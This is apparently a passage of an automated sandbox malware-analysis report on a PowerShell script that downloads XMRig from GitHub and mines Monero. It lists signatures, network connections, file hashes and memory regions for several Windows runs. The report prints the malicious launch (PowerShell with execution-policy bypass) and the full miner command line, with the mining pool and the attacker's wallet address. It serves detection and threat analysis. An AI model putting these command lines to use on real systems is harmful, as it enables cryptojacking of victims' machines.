| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/1964-4-0x00007FFFE8123000-0x00007FFFE8124000-memory.dmp
memory/1964-5-0x0000020E7F4E0000-0x0000020E7F502000-memory.dmp
memory/1964-8-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1964-9-0x0000020E7F690000-0x0000020E7F706000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3atkrxiw.cru.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1964-10-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1964-25-0x00007FFFE8120000-0x00007FFFE8B0C000-memory.dmp
memory/1964-48-0x0000020E7F670000-0x0000020E7F682000-memory.dmp
memory/1964-61-0x0000020E7F650000-0x0000020E7F65A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:28
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1752s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 2624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4988 wrote to memory of 2624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.14:443 |  | tcp |
Files
memory/4988-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zg0bcvbe.yhv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:55
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3272 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3272 wrote to memory of 4568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.136.73.23.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qu1jqn11.vr3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3272-25-0x00007FF8B8CC0000-0x00007FF8B96AC000-memory.dmp
memory/3272-48-0x000002A622860000-0x000002A622872000-memory.dmp
memory/3272-61-0x000002A6226B0000-0x000002A6226BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4568-152-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-153-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-154-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-155-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
memory/4568-156-0x00007FF77FA70000-0x00007FF7806A3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:03
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4952 wrote to memory of 532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4952 wrote to memory of 532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
memory/4952-0-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp
memory/4952-1-0x000001E92F580000-0x000001E92F5A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4e3dorbb.s4u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4952-11-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/4952-12-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/4952-14-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/4952-15-0x000001E92F710000-0x000001E92F722000-memory.dmp
memory/4952-16-0x000001E92F6F0000-0x000001E92F6FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/532-47-0x00000186CE410000-0x00000186CE430000-memory.dmp
memory/532-48-0x00000186CE460000-0x00000186CE480000-memory.dmp
memory/532-49-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-51-0x00000186CE4A0000-0x00000186CE4C0000-memory.dmp
memory/532-50-0x00000186CE480000-0x00000186CE4A0000-memory.dmp
memory/4952-54-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/532-52-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/4952-53-0x00007FF8EF1A3000-0x00007FF8EF1A5000-memory.dmp
memory/532-55-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/4952-56-0x00007FF8EF1A0000-0x00007FF8EFC61000-memory.dmp
memory/532-57-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-59-0x00000186CE4A0000-0x00000186CE4C0000-memory.dmp
memory/532-58-0x00000186CE480000-0x00000186CE4A0000-memory.dmp
memory/532-60-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-61-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-62-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-63-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-64-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-65-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-66-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-67-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-68-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-69-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-70-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-71-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-72-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-73-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-74-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-75-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-76-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-77-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-78-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-79-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-80-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-81-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-82-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-83-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-84-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-85-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-86-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-87-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-88-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-89-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-90-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-91-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-92-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-93-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-94-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-95-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-96-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-97-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-98-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-99-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-100-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-101-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-102-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-103-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-104-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-105-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-106-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-107-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-108-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-109-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-110-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-111-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-112-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-113-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-114-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-115-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-116-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-117-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
memory/532-118-0x00007FF609070000-0x00007FF609CA3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:05
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1755s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 612 wrote to memory of 4532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 612 wrote to memory of 4532 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
memory/612-4-0x00007FFA76483000-0x00007FFA76484000-memory.dmp
memory/612-5-0x00000290CC000000-0x00000290CC022000-memory.dmp
memory/612-6-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/612-10-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/612-9-0x00000290CC1B0000-0x00000290CC226000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4qbxt3eh.3h1.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/612-26-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/612-49-0x00000290CC190000-0x00000290CC1A2000-memory.dmp
memory/612-62-0x00000290CC170000-0x00000290CC17A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4532-91-0x0000020579660000-0x0000020579680000-memory.dmp
memory/4532-92-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-93-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/612-94-0x00007FFA76483000-0x00007FFA76484000-memory.dmp
memory/612-95-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp
memory/4532-96-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-97-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-98-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-99-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-100-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-101-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-102-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-103-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-104-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-105-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-106-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-107-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-108-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
memory/4532-109-0x00007FF67B280000-0x00007FF67BEB3000-memory.dmp
